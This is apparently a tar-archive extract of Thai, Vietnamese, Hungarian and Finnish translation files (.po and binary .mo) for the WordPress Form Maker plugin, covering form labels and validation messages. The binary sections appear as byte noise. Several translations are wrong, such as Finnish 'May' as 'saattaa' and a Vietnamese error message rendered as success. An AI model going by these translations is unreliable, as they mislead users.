#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "เขตข้อมูลที่จำเป็น"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "นี้ไม่ได้เป็นอีเมล์ที่ถูกต้อง"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid "You cannot select former dates. Choose a date starting from the current one."
msgstr "คุณไม่สามารถเลือกวันที่อดีต เลือกวันที่เริ่มต้นจากหนึ่งในปัจจุบัน"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "จะต้องมีค่าระหว่าง "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "ปริมาณ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "คะแนนของคุณควรจะน้อยกว่า "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "ชื่อโครงการวิจัย"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "อันดับแรก"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "ล่าสุด"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "middle"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "รหัสเมือง"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "หมายเลขโทรศัพท์:"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "ดอลลาร์ "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "เซ็นต์ "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "จาก "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "ไปยัง"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "ไป "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "ตั้งค่าใหม่ "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "เลือกฟิลด์"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "เลือกวันที่"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-vi.mo000060400000007741152434416630011622 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��
A
	L
V
b
e

r
}
�
!�
3�
!�

(-2?L
X	cmq#w����
�"<GI����4�h
7t
�
�
,�
Y�
7E9}'�:�W/r ��4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:06+0400
PO-Revision-Date: 2015-05-22 17:06+0400
Last-Translator: 
Language-Team: 
Language: vi
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
Tháng TưMã vùngTháng TámXuThành phốQuốc giaTháng mười haiĐô laLỗi, email đã được gửi.Lỗi, tập tin không thể được di chuyển.Lỗi, không chính xác Mã an.Tháng HaiĐầu tiênTừđi Tháng mộtTháng BảyTháng SáuBài mớiTháng BaMayTrungKhông có gì đã được gửi.Tháng mười mộtTháng MườiSố điện thoại· Mã bưu điện / mã ZIPSố lượngThiết lập lại Chọn ngàyChọn một lĩnh vực Tháng ChínXin lỗi, bạn không được phép để tải lên tập tin này.Tiểu Bang / Tỉnh / VùngĐịa chỉĐịa chỉ Dòng 2các Các tập tin vượt quá kích thước cho phép%s lĩnh vực này đòi hỏi một mục độc đáo và giá trị này đã được đệ trình.%value không phải là địa chỉ email hợp lệ.Tiêu đềĐểLiên kết xác minh là không hợp lệ.Bạn không thể chọn cựu ngày. Chọn một ngày bắt đầu từ hiện tại.Địa chỉ email của bạn đã được xác minh.Email của bạn đã được xác nhận thành công.Xác minh email của bạn đã hết.Hình thức của bạn đã được gửi thành công.IP của bạn là danh sách đen. Xin vui lòng liên hệ với quản trị websiteĐiểm số của bạn nên được ít hơnlĩnh vực được yêu cầu.giá trị phải là giữa languages/form_maker-hu_HU.mo000060400000007366152434416630012217 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��	A
K

X
c
i
q
	z
�
 �
!�
 �
	�
�

(	0:
BM	g	q{������5�0N^v2y`�$

2
7
%:
]`
%�
%�
(
3JI%���4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:57+0400
PO-Revision-Date: 2015-05-22 16:57+0400
Last-Translator: 
Language-Team: 
Language: hu
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
Április KörzetszámAugusztus Cent Város Ország December Dollár Hiba, e-mail nem lett elküldve.Hiba, a fájl nem lehet mozgatni.Hiba, hibás biztonsági kódot.Február Első-tőlmegy Január Július Június UtolsóMárcius Május KözépsőSemmi sem nyújtottak be.November Október TelefonszámPostal / Zip CodeMennyiség visszaállítása Válasszon ki egy dátumotVálasszon ki egy mezőt Szeptember Sajnálom, akkor nem tölthet fel ezt a fájltípust.Állam / Tartomány / RégióUtca, házszámUtca, házszám, 2. sora A fájl mérete meghaladja a megengedett méretétEbben a mezőben %s igényli egyedülálló bejegyzés és ezt az értéket már benyújtották.Ez nem egy érvényes e-mail címet.CímAzÍrja be a képen link érvénytelen.Nem tudja kiválasztani egykori tizenegy óra. Válasszon ki egy dátumot kezdve a jelenlegi.Az Ön e-mail cím már ellenőrizte.Az Ön e-mail sikeresen ellenőrizte.Az Ön e-mail ellenőrző időkorlátja.A forma sikeresen be.Az ip feketelistára. Lépjen kapcsolatba a webhely adminisztrátorának. A pontszám nem lehet kisebb, mint a mező kitöltése kötelező.érték között kell lennie languages/form_maker-fi.po000060400000057002152434416630011600 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:55+0400\n"
"PO-Revision-Date: 2015-05-22 16:55+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: fi\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Katuosoite"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Katuosoite Rivi 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Kaupunki"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "State / Province / Region"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Postinumero / Zip Code"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Maa"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Tammikuu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Helmikuu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Marssia!"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Huhtikuu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "saattaa"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Kesäkuu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Heinäkuu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Elokuu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Syyskuu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Lokakuu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "Marraskuu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Joulukuu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Virhe, väärän suojakoodin."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "IP on mustalla listalla. Ota yhteyttä sivuston ylläpitäjään."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Koko ylittää sallitun koon"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Pahoittelemme, et voi lähettää tämän tiedostotyypin."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Virhe, tiedostoa ei voi siirtää."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Tämän kentän %s vaatii ainutlaatuinen merkintä, ja tämä arvo on jo jätetty."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Virhe, sähköposti ei ole lähetetty."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Mitään ei jätetty."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Sinun lomake onnistuneesti toimitettu."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Virhe, sähköposti ei ole lähetetty."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Sähköpostiosoite on jo todennettu."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Viesti on onnistuneesti todennettu."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Sähköpostisi todentaminen on vanhentunut."

